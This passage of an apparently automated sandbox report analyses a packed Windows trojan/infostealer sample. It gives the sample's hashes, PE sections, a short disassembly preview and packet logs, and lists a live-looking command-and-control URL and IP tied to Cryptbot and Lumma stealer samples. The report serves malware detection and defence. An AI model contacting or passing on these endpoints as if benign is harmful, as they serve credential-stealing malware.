    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851true
        		unknown
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlt6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
            		high
            http://html4/loose.dtdt6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
              		high
              https://curl.se/docs/alt-svc.html#t6VDbnvGeN.exefalse
                		high
                http://home.fivetk5ht.top/zldPRt6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpt6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                    		unknown
                    https://httpbin.org/ipbeforet6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.htmlt6VDbnvGeN.exe, t6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                        		high
                        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1t6VDbnvGeN.exe, 00000001.00000003.1402020419.0000000001A61000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1436520961.0000000001A69000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1402037179.0000000001A67000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://curl.se/docs/hsts.html#t6VDbnvGeN.exefalse
                            		high
                            http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                              		unknown
                              https://curl.se/docs/http-cookies.html#t6VDbnvGeN.exefalse
                                		high
                                https://curl.se/docs/alt-svc.htmlt6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                                  		high
                                  http://.csst6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                                    		high
                                    http://home.fivetk5ht.top/zldPRE_t6VDbnvGeN.exe, 00000001.00000003.1401357288.0000000001ACD000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000003.1401710410.0000000001ADC000.00000004.00000020.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1437756228.0000000001ADD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://.jpgt6VDbnvGeN.exe, 00000001.00000003.1292166145.0000000007896000.00000004.00001000.00020000.00000000.sdmp, t6VDbnvGeN.exe, 00000001.00000002.1426333607.0000000000D9D000.00000040.00000001.01000000.00000004.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        185.121.15.192
                                        		home.fivetk5ht.topSpain
                                        		207046REDSERVICIOESfalse
                                        98.85.100.80
                                        		httpbin.orgUnited States
                                        		11351TWC-11351-NORTHEASTUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1578907
                                        Start date and time:2024-12-20 16:31:21 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 59s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:t6VDbnvGeN.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:9e3eebdf7f1998324106447a4eb441c8.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:Failed
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        10:32:27API Interceptor3x Sleep call for process: t6VDbnvGeN.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        185.121.15.19216ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                        • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                        pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                        • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                        CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                        • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
                                        5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                        • home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850
                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                        • home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=TmUWwkAQBKXXTWTE1734696758
                                        98.85.100.80CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                          u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                  file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                    Tii6ue74NB.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                          SwJD3kiOwV.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            home.fivetk5ht.tophUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 185.121.15.192
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 185.121.15.192
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 185.121.15.192
                                                            httpbin.org16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 34.226.108.155
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                            • 34.226.108.155
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 34.226.108.155
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC StealerBrowse
                                                            • 34.226.108.155

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            TWC-11351-NORTHEASTUSCMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 98.85.100.80
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 98.85.100.80
                                                            arm5.elfGet hashmaliciousMiraiBrowse
                                                            • 72.226.210.219
                                                            hmips.elfGet hashmaliciousMiraiBrowse
                                                            • 45.46.119.24
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 98.85.100.80
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                            • 98.85.100.80
                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                            • 67.252.15.48
                                                            la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                            • 98.94.131.188
                                                            file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                                            • 98.85.100.80
                                                            REDSERVICIOES16ebsersuX.exeGet hashmaliciousCryptbotBrowse
                                                            • 185.121.15.192
                                                            hUhhrsyGtz.exeGet hashmaliciousCryptbotBrowse
                                                            • 185.121.15.192
                                                            pCElIX19tu.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            CMpuGis28l.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            5Jat5RkD3a.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            u57m8aCdwb.exeGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.192
                                                            TnIhoWAr57.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                                            • 185.121.15.192
                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRATBrowse
                                                            • 185.121.15.192
                                                            http://blacksaltys.comGet hashmaliciousUnknownBrowse
                                                            • 185.121.15.137
                                                            IGz.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 185.189.98.142

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            No created / dropped files found

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                            Entropy (8bit):7.982368030810664
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • VXD Driver (31/22) 0.00%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:t6VDbnvGeN.exe
                                                            File size:4'454'912 bytes
                                                            MD5:9e3eebdf7f1998324106447a4eb441c8
                                                            SHA1:d12942ff362dcd14ae488b68c5c9585dea00098f
                                                            SHA256:5407d390bc945fe70785068124bf0a35d110e179aae137cdc67cce85824915bf
                                                            SHA512:83df6faaa8cb4892aa28880649bd10f008928ac39fc66475467cb35be72464e914135d2fa13f650625f3946ccfb6f9a30c5262d9e43e1cbcc13ba08fb8f4bec7
                                                            SSDEEP:98304:QME0xSOjUxSUTV202TlCie7PlzIY8OY8vQ2YM6zmJJxtL79:QwfdUTU02TlPe7PlzIYYMvY3uL
                                                            TLSH:F52633035BFBF084F4A8633452C5A62D7AE531346C33E35A059C7389C60FE7AB5169AE
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@.................................rHD...@... ............................

                                                            File Icon

                                                            Icon Hash:00928e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x1086000
                                                            Entrypoint Section:.taggant
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                            DLL Characteristics:DYNAMIC_BASE
                                                            Time Stamp:0x67639809 [Thu Dec 19 03:50:33 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp 00007F1C284CD39Ah
                                                            psubusb mm0, qword ptr [ebx+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007F1C284CF395h
                                                            add byte ptr [ebx], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], cl
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [ecx+00000080h], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x74705f0x73.idata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x7460000x1ac.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xc83ea80x10jyayxkzc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0xc83e580x18jyayxkzc
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            0x10000x7450000x284c00bd11fed6c083f8b5a8ac7626fb9641d3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x7460000x1ac0x200276a38012fe4577fd45e76106826e702False0.5859375data4.521067132921128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .idata 0x7470000x10000x200e84636d45557e74dadd0f14f36394655False0.166015625data1.1471680400846989IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            0x7480000x3850000x200a967315a7071a9fdc59a6807a570ed82unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            jyayxkzc0xacd0000x1b80000x1b72002b0c2ae76bc5da1f31c99fd74f95d574False0.9943974834543126data7.954718124398861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            tlfatyfb0xc850000x10000x400637d5fdf745258af236fb2e1ee1b52f6False0.798828125data6.162326391919003IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .taggant0xc860000x30000x2200499131df98e08d953a990437ac9f05dcFalse0.0661764705882353DOS executable (COM)0.7791474897854377IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_MANIFEST0xc83eb80x152ASCII text, with CRLF line terminators0.6479289940828402

                                                            Imports

                                                            DLLImport
                                                            kernel32.dlllstrcpy

                                                            Network Behavior

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:32:22.098685980 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:22.098731995 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:22.098845005 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:22.309181929 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:22.309215069 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.052647114 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.053436995 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.053452015 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.054879904 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.055018902 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.056760073 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.056833029 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.068917036 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.068932056 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.108452082 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.394114017 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.394238949 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:24.395323992 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.415216923 CET49701443192.168.2.798.85.100.80
                                                            Dec 20, 2024 16:32:24.415239096 CET4434970198.85.100.80192.168.2.7
                                                            Dec 20, 2024 16:32:26.712294102 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.831903934 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.833201885 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.834173918 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.953946114 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.953973055 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.953980923 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.953990936 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954149961 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954190016 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.954233885 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954243898 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.954250097 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954260111 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954308987 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954314947 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.954319954 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:26.954363108 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:26.954396009 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.073982954 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074048042 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074131966 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074130058 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.074142933 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074193001 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.074204922 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074244022 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.074295044 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.116668940 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.116830111 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.235974073 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.236087084 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.280241966 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.400042057 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.400203943 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.599992037 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.600052118 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.819925070 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.820363045 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.820473909 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.939945936 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940051079 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940314054 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940392017 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940396070 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940458059 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940465927 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940521955 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940557957 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940568924 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940578938 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940597057 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940608025 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940624952 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940668106 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940706015 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940716982 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940735102 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940759897 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940809965 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.940836906 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940848112 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.940907001 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.941148996 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941159964 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941168070 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941212893 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.941366911 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941378117 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941385984 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941801071 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941811085 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.941818953 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942140102 CET8049703185.121.15.192192.168.2.7
